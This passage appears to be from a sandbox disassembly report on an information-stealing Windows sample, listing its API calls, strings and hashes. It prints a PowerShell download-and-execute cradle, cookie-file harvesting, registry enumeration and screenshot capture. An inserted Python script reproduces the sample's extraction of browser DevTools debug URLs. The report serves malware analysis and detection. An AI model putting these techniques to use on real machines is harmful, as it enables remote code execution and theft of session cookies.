                                • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 006E4873
                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 006E4884
                                • GetProcAddress.KERNEL32(00000000,send), ref: 006E4895
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                • API String ID: 2238633743-3087812094
                                • Opcode ID: 39f8ad2f10eba4a8efbd18b24174d9289e84eb0c36759d638ab8d78963d8cfdb
                                • Instruction ID: f029228b7c96132f3fdad0252211c0618c835fb7cd2ec12c710089a5ac8e2093
                                • Opcode Fuzzy Hash: 39f8ad2f10eba4a8efbd18b24174d9289e84eb0c36759d638ab8d78963d8cfdb
                                • Instruction Fuzzy Hash: DC117872992B24EB8710DFB4AC0DF763AB9BA49705306081AF792D2260EEF45844DF54
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006DBE53
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006DBE86
                                • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 006DBE91
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DBEB1
                                • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 006DBEBD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DBEE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006DBEEB
                                • lstrlen.KERNEL32(')"), ref: 006DBEF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DBF13
                                • lstrcat.KERNEL32(00000000,')"), ref: 006DBF1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DBF46
                                • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 006DBF66
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DBF88
                                • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 006DBF94
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DBFBA
                                • ShellExecuteEx.SHELL32(?), ref: 006DC00C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 4016326548-898575020
                                • Opcode ID: 1ee32b8d7fca41ee7938b2d9df13df18261c15d1d39d0f238ea149751e2094a4
                                • Instruction ID: fe0f2dbd2b2273224752f566e23b66f59beb48597a4bae150122b19e5cd06d36
                                • Opcode Fuzzy Hash: 1ee32b8d7fca41ee7938b2d9df13df18261c15d1d39d0f238ea149751e2094a4
                                • Instruction Fuzzy Hash: 5A618D71E1064A9BCB21AFB69C89EBE7BAAFF44300F01142EE909D3315DF34D9018B95
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E184F
                                • lstrlen.KERNEL32(00F06F68), ref: 006E1860
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1887
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006E1892
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E18C1
                                • lstrlen.KERNEL32(006F4FA0), ref: 006E18D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E18F4
                                • lstrcat.KERNEL32(00000000,006F4FA0), ref: 006E1900
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E192F
                                • lstrlen.KERNEL32(00F06FB8), ref: 006E1945
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E196C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006E1977
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E19A6
                                • lstrlen.KERNEL32(006F4FA0), ref: 006E19B8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E19D9
                                • lstrcat.KERNEL32(00000000,006F4FA0), ref: 006E19E5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1A14
                                • lstrlen.KERNEL32(00F06FC8), ref: 006E1A2A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1A51
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006E1A5C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1A8B
                                • lstrlen.KERNEL32(00F07008), ref: 006E1AA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1AC8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006E1AD3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1B02
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen
                                • String ID:
                                • API String ID: 1049500425-0
                                • Opcode ID: d65a76b15af718b53099bf1886d4d630efe58a82dea6d26a2f20b33069f41d8d
                                • Instruction ID: 1958318817cfb4fa626f4974656022d502aa4f53fe0fea66898f2a44a380663a
                                • Opcode Fuzzy Hash: d65a76b15af718b53099bf1886d4d630efe58a82dea6d26a2f20b33069f41d8d
                                • Instruction Fuzzy Hash: 1E9108B06027479BD720AFBADC98E66B6EAFF45300B14482DA88AC7351DF34E841DB50
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D4793
                                • LocalAlloc.KERNEL32(00000040,?), ref: 006D47C5
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D4812
                                • lstrlen.KERNEL32(006F4B60), ref: 006D481D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D483A
                                • lstrcat.KERNEL32(00000000,006F4B60), ref: 006D4846
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D486B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D4898
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D48A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D48CA
                                • StrStrA.SHLWAPI(?,00000000), ref: 006D48DC
                                • lstrlen.KERNEL32(?), ref: 006D48F0
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D4931
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D49B8
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D49E1
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D4A0A
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D4A30
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D4A5D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 4107348322-3310892237
                                • Opcode ID: 3a9c82b51f7ae6ccaa8f953b6b0005e65692b306d6a5d038a78a51262982fa07
                                • Instruction ID: 9a2cfbe211f40e9c4a42a7bbce85280e63d1aa7de8fd0957cb4882f6164bbbcc
                                • Opcode Fuzzy Hash: 3a9c82b51f7ae6ccaa8f953b6b0005e65692b306d6a5d038a78a51262982fa07
                                • Instruction Fuzzy Hash: B4B16C71A116469BCB21EFB6D899EAE77AAEF44300F04452DFC4AA7311DF34EC058B94
                                APIs
                                  • Part of subcall function 006C90C0: InternetOpenA.WININET(006ECFEC,00000001,00000000,00000000,00000000), ref: 006C90DF
                                  • Part of subcall function 006C90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 006C90FC
                                  • Part of subcall function 006C90C0: InternetCloseHandle.WININET(00000000), ref: 006C9109
                                • strlen.MSVCRT ref: 006C92E1
                                • strlen.MSVCRT ref: 006C92FA
                                  • Part of subcall function 006C8980: std::_Xinvalid_argument.LIBCPMT ref: 006C8996
                                • strlen.MSVCRT ref: 006C9399
                                • strlen.MSVCRT ref: 006C93E6
                                • lstrcat.KERNEL32(?,cookies), ref: 006C9547
                                • lstrcat.KERNEL32(?,006F1794), ref: 006C9559
                                • lstrcat.KERNEL32(?,?), ref: 006C956A
                                • lstrcat.KERNEL32(?,006F4B98), ref: 006C957C
                                • lstrcat.KERNEL32(?,?), ref: 006C958D
                                • lstrcat.KERNEL32(?,.txt), ref: 006C959F
                                • lstrlen.KERNEL32(?), ref: 006C95B6
                                • lstrlen.KERNEL32(?), ref: 006C95DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C9614
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Similarity
                                • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                • API String ID: 1201316467-3542011879
                                • Opcode ID: 44777e5b9c6f708436835f38d9162dec126df80ae1e852fa478da4f94ae6b6ca
                                • Instruction ID: c2bf3ad634abc699b45d377cb1ea2e4c2dc097b072345f0ef5135a0636e59477
                                • Opcode Fuzzy Hash: 44777e5b9c6f708436835f38d9162dec126df80ae1e852fa478da4f94ae6b6ca
                                • Instruction Fuzzy Hash: 75E11571E00219DBDF54DFA9D894BEEBBB6FF48300F1044ADE909A7241DB309A45CBA5
                                APIs
                                • memset.MSVCRT ref: 006DD9A1
                                • memset.MSVCRT ref: 006DD9B3
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006DD9DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DDA0E
                                • lstrcat.KERNEL32(?,00000000), ref: 006DDA1C
                                • lstrcat.KERNEL32(?,00F205B0), ref: 006DDA36
                                • lstrcat.KERNEL32(?,?), ref: 006DDA4A
                                • lstrcat.KERNEL32(?,00F1F020), ref: 006DDA5E
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DDA8E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006DDA95
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006DDAFE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Similarity
                                • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2367105040-0
                                • Opcode ID: 8f4cf5b0a3537c9a5d61b52c73ac3797df4fe88cf542cef6206d108f841e8655
                                • Instruction ID: ba32f2d788a528e9d80be773d9a6fb604dcd0274172d215e0454939a425885bc
                                • Opcode Fuzzy Hash: 8f4cf5b0a3537c9a5d61b52c73ac3797df4fe88cf542cef6206d108f841e8655
                                • Instruction Fuzzy Hash: B6B15EB1D10259ABDB10EFB4D898EFE77BAFF88300F144569E94AA7350DA309E45CB50
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CB330
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CB37E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CB3A9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CB3B1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CB3D9
                                • lstrlen.KERNEL32(006F4C50), ref: 006CB450
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CB474
                                • lstrcat.KERNEL32(00000000,006F4C50), ref: 006CB480
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CB4A9
                                • lstrlen.KERNEL32(00000000), ref: 006CB52D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CB557
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CB55F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CB587
                                • lstrlen.KERNEL32(006F4AD4), ref: 006CB5FE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CB622
                                • lstrcat.KERNEL32(00000000,006F4AD4), ref: 006CB62E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CB65E
                                • lstrlen.KERNEL32(?), ref: 006CB767
                                • lstrlen.KERNEL32(?), ref: 006CB776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CB79E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: 07076c74acf082d1b9cec84439303526269f7b9b2491ae8a019549d1b8058fe0
                                • Instruction ID: 4369463b9b7f9a9ece773d473047e78d8e1fefb94b2f178c3adab3033111386d
                                • Opcode Fuzzy Hash: 07076c74acf082d1b9cec84439303526269f7b9b2491ae8a019549d1b8058fe0
                                • Instruction Fuzzy Hash: A2021B70A012068FCB25DF65D95AFBAB7A6FF44304F18906DE8099B361DB35DC82CB90
                                APIs
                                  • Part of subcall function 006E71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006E71FE
                                • RegOpenKeyExA.ADVAPI32(?,00F1BEA8,00000000,00020019,?), ref: 006E37BD
                                • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 006E37F7
                                • wsprintfA.USER32 ref: 006E3822
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 006E3840
                                • RegCloseKey.ADVAPI32(?), ref: 006E384E
                                • RegCloseKey.ADVAPI32(?), ref: 006E3858
                                • RegQueryValueExA.ADVAPI32(?,00F203B8,00000000,000F003F,?,?), ref: 006E38A1
                                • lstrlen.KERNEL32(?), ref: 006E38B6
                                • RegQueryValueExA.ADVAPI32(?,00F20310,00000000,000F003F,?,00000400), ref: 006E3927
                                • RegCloseKey.ADVAPI32(?), ref: 006E3972
                                • RegCloseKey.ADVAPI32(?), ref: 006E3989
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 13140697-3278919252
                                • Opcode ID: edb4cd217f9e4f1d767863378100d724f34819353b7e794ff9e9fbeb235c4d36
                                • Instruction ID: 8716925c9419122602df906c515948b64e78482a70786fce2fe4e7867b2053b4
                                • Opcode Fuzzy Hash: edb4cd217f9e4f1d767863378100d724f34819353b7e794ff9e9fbeb235c4d36
                                • Instruction Fuzzy Hash: 19917E729012589FCB10DFA5D984EEEB7BAFB88310F14856DE509AB311DB31AE45CF90
                                APIs
                                • InternetOpenA.WININET(006ECFEC,00000001,00000000,00000000,00000000), ref: 006C90DF
                                • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 006C90FC
                                • InternetCloseHandle.WININET(00000000), ref: 006C9109
                                • InternetReadFile.WININET(?,?,?,00000000), ref: 006C9166
                                • InternetReadFile.WININET(00000000,?,00001000,?), ref: 006C9197
                                • InternetCloseHandle.WININET(00000000), ref: 006C91A2
                                • InternetCloseHandle.WININET(00000000), ref: 006C91A9
                                • strlen.MSVCRT ref: 006C91BA
                                • strlen.MSVCRT ref: 006C91ED
                                • strlen.MSVCRT ref: 006C922E
                                • strlen.MSVCRT ref: 006C924C
                                  • Part of subcall function 006C8980: std::_Xinvalid_argument.LIBCPMT ref: 006C8996
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                • API String ID: 1530259920-2144369209
                                • Opcode ID: 7d9c41cdd90afea99622115dde6c63bb2af21ee664c455d8749fe3b35bbef64f
                                • Instruction ID: 8c41ca0ce05017b65569c0980b34f82dcc759243b3c5949f9b2bf4b2fa59b619
                                • Opcode Fuzzy Hash: 7d9c41cdd90afea99622115dde6c63bb2af21ee664c455d8749fe3b35bbef64f
                                • Instruction Fuzzy Hash: B6519371610249ABD720DFA8DC49FEEB7BAEF44720F140169F505A3281DFB4AA44C7A5
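The record above shows the sample fetching http://localhost:9229/json over WinINet and then searching the response for the literals "webSocketDebuggerUrl": and "ws:// with nothing but strlen calls, which is how a DevTools remote-debugging target listing is consumed without a JSON parser. The following is an added example for this report, not code recovered from the sample or shipped with Joe Sandbox: it reproduces that substring scan beside a reference JSON parse so an analyst can confirm both agree on a listing. SAMPLE_LISTING is constructed to match the documented /json target format of Chromium and Node.js DevTools (9229 is the Node inspector default); its target ids and page URLs are illustrative.

```python
"""DevTools /json listing extraction: substring scan (as the sample's
strlen-only loop implies) beside a reference JSON parse.

Added example for this report; not code recovered from the sample.
SAMPLE_LISTING is constructed; ids and URLs are illustrative only."""
import json
from urllib.parse import urlparse

# Constructed /json response in the documented DevTools target format.
SAMPLE_LISTING = """[ {
  "description": "",
  "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/1A2B3C",
  "id": "1A2B3C",
  "title": "Example",
  "type": "page",
  "url": "https://example.com/",
  "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/1A2B3C"
}, {
  "description": "",
  "id": "4D5E6F",
  "title": "Service Worker",
  "type": "service_worker",
  "url": "https://example.com/sw.js",
  "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/4D5E6F"
} ]"""

KEY = '"webSocketDebuggerUrl":'   # string literal present in the sample
WS_PREFIX = '"ws://'              # string literal present in the sample


def extract_ws_urls_scan(body: str) -> list[str]:
    """Substring scan with no JSON parser: find each webSocketDebuggerUrl key,
    then the quoted ws:// value after it. Returns every such URL in order.
    A truncated value (no closing quote) ends the scan without a result."""
    urls, pos = [], 0
    while (k := body.find(KEY, pos)) >= 0:
        v = body.find(WS_PREFIX, k + len(KEY))
        if v < 0:
            break
        end = body.find('"', v + len(WS_PREFIX))
        if end < 0:
            break
        urls.append(body[v + 1:end])   # skip the opening quote
        pos = end
    return urls


def extract_ws_urls_json(body: str) -> list[str]:
    """Reference extraction with a real JSON parser, for comparison."""
    return [t["webSocketDebuggerUrl"]
            for t in json.loads(body) if "webSocketDebuggerUrl" in t]


def debug_endpoint(ws_url: str) -> tuple[str, int]:
    """Host and port of the debug socket a stolen listing points at."""
    u = urlparse(ws_url)
    return u.hostname, u.port
```

On a live host the only thing worth alerting on is the fetch itself: nothing legitimate in a user session should be reading the inspector listing of a browser or Node process on the loopback interface.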
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 006E16A1
                                • lstrcpy.KERNEL32(00000000,00F0A750), ref: 006E16CC
                                • lstrlen.KERNEL32(?), ref: 006E16D9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E16F6
                                • lstrcat.KERNEL32(00000000,?), ref: 006E1704
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E172A
                                • lstrlen.KERNEL32(00F1FF28), ref: 006E173F
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E1762
                                • lstrcat.KERNEL32(00000000,00F1FF28), ref: 006E176A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1792
                                • ShellExecuteEx.SHELL32(?), ref: 006E17CD
                                • ExitProcess.KERNEL32 ref: 006E1803
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                • String ID: <
                                • API String ID: 3579039295-4251816714
                                • Opcode ID: a4d54ffe67e15c83f871f725c6e436e293759c7beda8a3e89f4ed37a8dc31830
                                • Instruction ID: 9fdf00861f827ca6c9ad5a9a7af58e443dd1dcdf4f500efd1485e961e7e4dc4a
                                • Opcode Fuzzy Hash: a4d54ffe67e15c83f871f725c6e436e293759c7beda8a3e89f4ed37a8dc31830
                                • Instruction Fuzzy Hash: 00515F70A0265AABDB11DFB6C894EAEB7BAFF44700F044129E909E7351DF30AE01CB54
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DEFE4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DF012
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006DF026
                                • lstrlen.KERNEL32(00000000), ref: 006DF035
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 006DF053
                                • StrStrA.SHLWAPI(00000000,?), ref: 006DF081
                                • lstrlen.KERNEL32(?), ref: 006DF094
                                • lstrlen.KERNEL32(00000000), ref: 006DF0B2
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 006DF0FF
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 006DF13F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$AllocLocal
                                • String ID: ERROR
                                • API String ID: 1803462166-2861137601
                                • Opcode ID: 8a327b3f5ac784ecbe57ebaef47b4d6f083d8eecc496fd8f3e08d0d1a750490c
                                • Instruction ID: 7225114c3fe9b79c1ab40d97a44db5bbe0409abb91308983d8e19bb3c8d91ebf
                                • Opcode Fuzzy Hash: 8a327b3f5ac784ecbe57ebaef47b4d6f083d8eecc496fd8f3e08d0d1a750490c
                                • Instruction Fuzzy Hash: 3C517771A106069FCB21AB7ADC59FBA77A6EF90300F04406EEC4ADB312DE30DC018B94
                                APIs
                                • GetEnvironmentVariableA.KERNEL32(00F18B60,008F9BD8,0000FFFF), ref: 006CA026
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CA053
                                • lstrlen.KERNEL32(008F9BD8), ref: 006CA060
                                • lstrcpy.KERNEL32(00000000,008F9BD8), ref: 006CA08A
                                • lstrlen.KERNEL32(006F4C4C), ref: 006CA095
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CA0B2
                                • lstrcat.KERNEL32(00000000,006F4C4C), ref: 006CA0BE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CA0E4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CA0EF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CA114
                                • SetEnvironmentVariableA.KERNEL32(00F18B60,00000000), ref: 006CA12F
                                • LoadLibraryA.KERNEL32(00F04FF0), ref: 006CA143
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                • String ID:
                                • API String ID: 2929475105-0
                                • Opcode ID: e2b51c3ff6d98ac486952cb610bc7ddcbdc1eb6c25b04b5366c7ab8967ab27f8
                                • Instruction ID: 74da5ec27135c037641f32edce80168a6049f812f1c1de79d84f24dd257e4dbe
                                • Opcode Fuzzy Hash: e2b51c3ff6d98ac486952cb610bc7ddcbdc1eb6c25b04b5366c7ab8967ab27f8
                                • Instruction Fuzzy Hash: 38917C30A00A198FD7219FF4DC48FB636A7FB54718B44412CE90987762EF79D981CB92
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006DC8A2
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006DC8D1
                                • lstrlen.KERNEL32(00000000), ref: 006DC8FC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DC932
                                • StrCmpCA.SHLWAPI(00000000,006F4C3C), ref: 006DC943
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: 0631bd5afbbbceca41464c65418313b14a697a36c14290e58593347e2e8a97cf
                                • Instruction ID: e63f04a11500e773bef08abdec33c856418ed172fd7d6a034fcf6f961e64fbd1
                                • Opcode Fuzzy Hash: 0631bd5afbbbceca41464c65418313b14a697a36c14290e58593347e2e8a97cf
                                • Instruction Fuzzy Hash: 16618D71D1121A9BDB10EFB58849FFE7BBABF45360F04006AE845E7341DB349905CBA0
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,006E0CF0), ref: 006E4276
                                • GetDesktopWindow.USER32 ref: 006E4280
                                • GetWindowRect.USER32(00000000,?), ref: 006E428D
                                • SelectObject.GDI32(00000000,00000000), ref: 006E42BF
                                • GetHGlobalFromStream.COMBASE(006E0CF0,?), ref: 006E4336
                                • GlobalLock.KERNEL32(?), ref: 006E4340
                                • GlobalSize.KERNEL32(?), ref: 006E434D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                • String ID:
                                • API String ID: 1264946473-0
                                • Opcode ID: f674e65531912ce88b2b76a212c8931d4bf6569342a67080e1312a1aa372752c
                                • Instruction ID: a6946b8e8aeb92e188bc35d3895e2ed076c8f37d66cee33bff6ae9fffd02481c
                                • Opcode Fuzzy Hash: f674e65531912ce88b2b76a212c8931d4bf6569342a67080e1312a1aa372752c
                                • Instruction Fuzzy Hash: 0551F9B5A10209AFDB10DFB5DC89EBEB7B9FF88310F104519F905A7250DE34AA01CBA4
                                APIs
                                • lstrcat.KERNEL32(?,00F205B0), ref: 006DE00D
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006DE037
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DE06F
                                • lstrcat.KERNEL32(?,00000000), ref: 006DE07D
                                • lstrcat.KERNEL32(?,?), ref: 006DE098
                                • lstrcat.KERNEL32(?,?), ref: 006DE0AC
                                • lstrcat.KERNEL32(?,00F0A6D8), ref: 006DE0C0
                                • lstrcat.KERNEL32(?,?), ref: 006DE0D4
                                • lstrcat.KERNEL32(?,00F1F4C0), ref: 006DE0E7
